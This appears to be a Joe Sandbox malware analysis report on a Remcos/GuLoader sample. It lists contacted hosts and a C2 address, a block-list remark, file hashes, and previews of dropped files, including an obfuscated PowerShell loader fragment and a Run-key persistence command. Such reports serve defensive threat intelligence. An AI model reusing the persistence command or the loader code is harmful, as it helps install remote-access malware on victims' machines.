            https://www.google.com | Conspect124.exe | false | Avira URL Cloud: safe | unknown
            https://cmgtrading.eu/eODGqfP132.binC | Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.3165842490.0000000004961000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/ | powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.google.com/accounts/servicelogin | Conspect124.exe | false | Avira URL Cloud: safe | unknown
            https://login.yahoo.com/config/login | Conspect124.exe | false | Avira URL Cloud: safe | unknown
            http://www.nirsoft.net/ | Conspect124.exe | false | Avira URL Cloud: safe | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.3165842490.0000000004961000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.ebuddy.com | Conspect124.exe | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.26.107.57 | cmgtrading.eu | France | 24935 | ATE-ASFR | false
107.173.4.16 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Note that the reputation verdict alone understates 185.26.107.57: the URL list above and the context tables below tie cmgtrading.eu to the .bin download URLs used by this and related Remcos/GuLoader samples, so it belongs on the block list alongside the C2 at 107.173.4.16. geoplugin.net is a public geolocation service that Remcos queries at start-up (the dropped json.gp response is listed under the dropped files), which makes it a useful detection pivot but not attacker infrastructure.
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1518329
                Start date and time:2024-09-25 15:58:09 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 50s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:SDWLLRJcsY.exe
                renamed because original name is a hash value
                Original Sample Name:7bd1cce43f6b48c8ddd492e5711fd17f.exe
                Detection:MAL
                Classification:mal100.phis.troj.spyw.evad.winEXE@17/15@2/3
                EGA Information:
                • Successful, ratio: 83.3%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 183
                • Number of non-executed functions: 232
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 6940 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: SDWLLRJcsY.exe
Time | Type | Description
09:59:02 | API Interceptor | 42x Sleep call for process: powershell.exe modified
10:02:05 | API Interceptor | 753065x Sleep call for process: Conspect124.exe modified
15:01:26 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value "Startup key": %Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)
15:01:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value "Startup key": %Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
185.26.107.57 | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | cmgtrading.eu/FqVHUWUBY92.bin
185.26.107.57 | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | cmgtrading.eu/FqVHUWUBY92.bin
185.26.107.57 | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | cmgtrading.eu/FqVHUWUBY92.bin
185.26.107.57 | Doc_3485638568454.docx.doc | malicious | AveMaria, UACMe | zqpispa.it/
107.173.4.16 | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | -
107.173.4.16 | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | -
107.173.4.16 | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | -
107.173.4.16 | Mcib4Llptj.exe | malicious | Remcos | -
107.173.4.16 | SecuriteInfo.com.W64.GenKryptik.MAGC.tr.15181.21426.exe | malicious | Remcos | -
107.173.4.16 | 2NyX8R4CZo.exe | malicious | Remcos | -
107.173.4.16 | wcNDx6MT9O.exe | malicious | Remcos | -
107.173.4.16 | 1Ccw7uyuFv.exe | malicious | Remcos | -
107.173.4.16 | RFQ_83747384738757384754837483.xls | malicious | Remcos, PrivateLoader | -
107.173.4.16 | Soxj8psIXH.exe | malicious | Remcos, PrivateLoader, PureLog Stealer | -
178.237.33.50 | BL.xls | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | z65orderrequest.bat.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | 1DUCJGrpyb.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | XjPA2pnUhC.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | geoplugin.net/json.gp
178.237.33.50 | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
cmgtrading.eu | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 185.26.107.57
cmgtrading.eu | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 185.26.107.57
cmgtrading.eu | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | 185.26.107.57
geoplugin.net | BL.xls | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | z65orderrequest.bat.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | 1DUCJGrpyb.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | XjPA2pnUhC.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
geoplugin.net | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 178.237.33.50
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
ATOM86-ASATOM86NL | BL.xls | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | z65orderrequest.bat.exe | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | 1DUCJGrpyb.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | XjPA2pnUhC.exe | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 178.237.33.50
ATOM86-ASATOM86NL | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 178.237.33.50
AS-COLOCROSSINGUS | BL.xls | malicious | Remcos, PureLog Stealer | 104.168.32.148
AS-COLOCROSSINGUS | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 192.210.150.29
AS-COLOCROSSINGUS | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 192.3.146.145
AS-COLOCROSSINGUS | K0hpP6V2fo.rtf | malicious | DBatLoader, Remcos | 107.175.243.142
AS-COLOCROSSINGUS | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | 107.175.113.252
AS-COLOCROSSINGUS | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | TT4729920DBO.xls | malicious | Remcos | 107.175.113.252
AS-COLOCROSSINGUS | NEW ORDER.xls | malicious | Unknown | 107.172.148.197
ATE-ASFR | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 185.26.107.57
ATE-ASFR | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 185.26.107.57
ATE-ASFR | GFqY91CTOZ.hta | malicious | Cobalt Strike, Remcos, GuLoader | 185.26.107.57
ATE-ASFR | https://forrefab.ae/ | malicious | Unknown | 185.26.107.54
ATE-ASFR | nCOg3q4a8C.exe | malicious | AgentTesla | 185.26.107.246
ATE-ASFR | SlHgSOYcMY.exe | malicious | Unknown | 185.26.106.244
ATE-ASFR | fQsT6cuFUj.exe | malicious | AgentTesla | 185.26.107.246
ATE-ASFR | BiL6ODSRNK.exe | malicious | AgentTesla | 185.26.107.246
ATE-ASFR | http://larrys474-my.sharepoint.com | malicious | Unknown | 185.26.107.51
ATE-ASFR | https://cutt.ly/rwnG29k1 | malicious | Unknown | 185.26.107.51
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | DÜZELTİLDİ SÖZLEŞME-pdf.bat.exe | malicious | FormBook, GuLoader | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | cDErPwSuCB.exe | malicious | Unknown | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | tpq.ps1 | malicious | Unknown | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | Kv1tZKstAC.exe | malicious | Unknown | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | z65orderrequest.bat.exe | malicious | GuLoader, Remcos | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | Swift_Copy_401812_301823-30391_#9812_9202938.exe | malicious | GuLoader, PureLog Stealer | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | 117532123_20240925-9_MCZB·pdf.vbs | malicious | Remcos, GuLoader | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz | 185.26.107.57
37f463bf4616ecd445d4a1937da06e19 | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 185.26.107.57
                                    No context
                                    Process:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):962
                                    Entropy (8bit):5.013811273052389
                                    Encrypted:false
                                    SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                    MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                    SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                    SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                    SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):995120
                                    Entropy (8bit):6.308705975745299
                                    Encrypted:false
                                    SSDEEP:12288:5Ly0SryvXRpHnez0SBkasZa0kITLwn096zdZEkINz3WSV3:5Ly0SG/zHMBbsZadi80qZgNz3R
                                    MD5:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    SHA1:3F650D8993C542682AA61C725EA1BB4EE93D259A
                                    SHA-256:C5636797B8BAD3E9FF18F51D269ACE0948112D9FF03A9900A174687FEC4BAE3B
                                    SHA-512:FE804B78CD734192664366364B099A5676D58101B9FE03C40C925CFE1CC202A99E04094D0FA93338ED831015D7CCD2EDE88F04AB3CF6410542853A5A228FACE2
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 13%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.......................................@.........................................................X%...............................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):15728640
                                    Entropy (8bit):0.10805027086476268
                                    Encrypted:false
                                    SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                    MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                    SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                    SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                    SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                    Malicious:false
                                    Preview:n..y... ...................':...{........................Z.....9....{S......{w.h.\.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...................................H......{w.................2.G......{w..........................#......h.\.....................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                    Category:dropped
                                    Size (bytes):2
                                    Entropy (8bit):1.0
                                    Encrypted:false
                                    SSDEEP:3:Qn:Qn
                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                    Malicious:false
                                    Preview:..
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):351177
                                    Entropy (8bit):7.657835458357298
                                    Encrypted:false
                                    SSDEEP:6144:5CUTXNxYlA/sN5c49Y34ocMiNOSQGT0aMeoAB+mtWAV5og++d6r3Aq5:pXbsN5hY3AMiXQGT3BXtWK5og+06r3N5
                                    MD5:7E58D69270577649E3FEC5909C0E0F20
                                    SHA1:C92DE1CDD263A8AFAB112624F7FE3DD991B11BC3
                                    SHA-256:D9271BAAAE1E38C317AB57E2E2CA4A0F3448B23ADB16AF5894F0A55F3CCF5728
                                    SHA-512:B1C38694C80459B66DC7A34017D6F6A11C57251E9EB6E4F96D14BDE9917B0B4D3D85B2875AAF550CE2159DC119EDE91705E0A4AB9A7FF78D81F4D20110667EE4
                                    Malicious:false
                                    Preview:............z....... ............_...........u....>........UUUU..)...............**.d...9......KK.....QQ..Z.......==.22...#####..............NN.....g.................c...........a........{....q.......[.................eeeeee.Z.6..................................F.....................bbb.o...2.......MM..////.GG..*..9999.............(((.................................0...T...$..SSSS.u....)......................--.VVV.......!.....................CC.............EEE......H.....VV..).............J...A..........XX.....LL..........................}}}.............K.............. ..AA..................b.@@...............>>>........N......44.......FFFF............,..........I...@@@@@.......................QQ......................F.l.....;;;;;...t.~.ff........>>.............99..............JJ.nnnnnn.h....hhhhhh.....'.....(((...............h.gggggg................UU......................dd...cc.$$..kk....|......VV......8..(.xx..............J...............".................bbb...................
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):385193
                                    Entropy (8bit):1.2513468259126719
                                    Encrypted:false
                                    SSDEEP:768:aEMZI3FIfIoASNikk5oeF4qQ7kjt8IrwghWyIgttkVVaxtWJjwHwUZJLPS/UpQFs:4IM85MQZxPWpILCm58b9QeiKhsRR7U
                                    MD5:C73A822A5DC42DEF82529419505D4D34
                                    SHA1:2F09CC0773FD145E60C4C20F9B8085624D0960A6
                                    SHA-256:99EECD9B8808E7B171AE3B9E08B1EFE75CBA0BAFDE4ECF1D240A2BA1F28EC637
                                    SHA-512:C6AAE8D60B43A7D7D1C287F70D91B35E914B0B4C53449B34D3E9D773C7909395755D9266FC4BA88648BC4E94614E550877D1DF54CB7547274D3EEA35ECFAA910
                                    Malicious:false
                                    Preview:........].........................................................$.....$.........................................................................................(..........................................................9..........................s...............................................................................................................................................................................A............................................................~................................F...B........s.....................................X...?.....................M.......................I..................................................................................................SJ............3.K.......M.........................................................................................................................................................7....._.................................E............................................K..................
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):413966
                                    Entropy (8bit):1.2545701143598162
                                    Encrypted:false
                                    SSDEEP:1536:b2T3E/ySYfBk8nalEPTUh6Va4fPKCPdsqNQj:ij9fBk8alsUhH8js6c
                                    MD5:2563D98DE6469D9979963EFD8D66736D
                                    SHA1:4D98E68617BE777AB97514BDF59CA98AA1102C5F
                                    SHA-256:B7423FE1148A2EA0E5BDE3855DFAB272400202AD01A2402F76E6E5F7DD5E0AE5
                                    SHA-512:C3FDB8870482B6C1A08A3088ED4539746E4F5DFAF63C8AD5F7B7873D2F3FC4FE8945493888422C487F5DB1E216A289A431890E6100A1A10C4ED6BCB2DD8CBBA4
                                    Malicious:false
                                    Preview:.....c.........../..............................u.....................................................................................h......2...............................................*...l...........................;.....................n......a......................I...........................x.;...............................................................................................................................................M....................._...............................................................+...c.....;.j........................................2.........................................................I......................................o..........d.........A.....4.....................r..........................p...........................................................T........................................................................L.......................................................G.............................,.....................
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:ASCII text, with very long lines (359), with no line terminators
                                    Category:dropped
                                    Size (bytes):359
                                    Entropy (8bit):4.308814426836422
                                    Encrypted:false
                                    SSDEEP:6:BSX8gnAA04KQeCVNcTKwLD3YAP7bqJINNQUmAdlvKRScZRIOrSeNRRAAefDPJzMA:wdAAMAszL8vJaNFmO0RSGDHRCNYR02yR
                                    MD5:2F193BC3BEEF5356ACF62CB12C2C4EF8
                                    SHA1:6E868DFB3D7ACB1D2C56E0EFA292CD7CF0DEC661
                                    SHA-256:10F1E86374C489E6FFC58B8213423687440ADDC3E483F5C84BE1F34D5DA23754
                                    SHA-512:4D5A2B7BD1C9A034A9A481BAA6C6D5D530AF5B3F95C8B1028C4DAB96FFA6199071E30CF1EB462B790AC845AA8BEAE34A0800741FBAC10242A3F38904593200EB
                                    Malicious:false
                                    Preview:succesforfattere homogamous monkeyishly funktionsstarts phylactolaemata.sextodecimos danmarkspremiere marrietta ancience.brisks grippelike hulebeboere flovmnds retrterne,roxbury marmorgulvets apogamic delprogrammers pips,selvglad polyhistorian flunkeyish deklasserings gidjee regnskabsinformationens,plasma anstandsdamernes pompejansk afmnstre afstbningernes,
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:ASCII text, with very long lines (57490), with no line terminators
                                    Category:dropped
                                    Size (bytes):57490
                                    Entropy (8bit):5.299568461510008
                                    Encrypted:false
                                    SSDEEP:1536:Ag8ORXWpDoT1NgkxLI7YmwDFwkim9iwRujs:Ag9T1SkWY32kVMs
                                    MD5:21F8B55EFF5453C6E94223B12647704A
                                    SHA1:8938162C626C171D76F37DEEBC2534E53D1870ED
                                    SHA-256:6D09C0544B4419FF08386626E6609B03036C999DA12AFB6AD3F1BEB2673C0894
                                    SHA-512:E87A707EDC2147A63E49900446CDF3EAAB287B71B1EA0779A2DC4D696B543692B8E9D85E510B8343F0083F25F8DF8349CE68010FEC40029D6E09151A98FA92F3
                                    Malicious:true
                                    Preview:$Endevendte=$Stemplingitheism;<#Arbejdssteder Solubilization Teat Nonrelativity #><#Centerbutikker Smaakrybets Glosserede Buksen Bagklogskabs Statusoptllingens Afgangshaller #><#Sadisten Pequot Hvisk Repress #><#Rnenes Aspargesbenets Lskbe Cableless Kumbaloi Ekstraudgavens Truismernes #><#Unnegated Tiremaid Autismens Heresies #><#Saccharonate Elefantsygdomme Indehiscent Asfaltens Gomer Quids #>$gennemsejle = " Toll;Disob`$InspeCTinseaFi,mdmDecrepKl ssiov rcnA tikgStr apIn.isl SkeeaSpiridBill,s Opkae S aarOverfnUn.uleSwellsPokun=Sierr`$Inwe SUnda p ilmil leaviMedvitCountnLoddei Parin mblyg .rkneChronr lammn Ty kePostfsGrade2Melod3Genop2Bookk; LuxmfRundiuBerignEkstrcAp rotCuy.pi.rsinoByplanNondr ConfeLVatera S.tegSkrmteBaronrCrotapVildmlcellua genidSparrs Spise Codir.nfornConceeOrdin1Fonde9Flyve7Sa,am Kalib(Kaiak`$ H,koFLiqu o Gum rGy nasWit hisyv rm lagepPlastlReacqe In,ed,ongeeAccomsStemm,Skuml`$StatuS Dobbt assaeDa,rymHovm pRetsplSpiloi C rdn IntegExact)Sur,e Ektex{,verl.Copro`$HeresA
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):257970
                                    Entropy (8bit):1.256808441775652
                                    Encrypted:false
                                    SSDEEP:1536:KcEgmiyf7PGBgwWjC81son6i0q8s0If3y:WDLGoB0q8K3
                                    MD5:9F966EC38C037968BA52C7C6A58EAED1
                                    SHA1:31BC370E88A2A10950D4C3AE24C28DF7E2D89868
                                    SHA-256:B4B70294B142D598F5E391EE8D371014C4AEFA8272754CE0094A8F802ADFA1DA
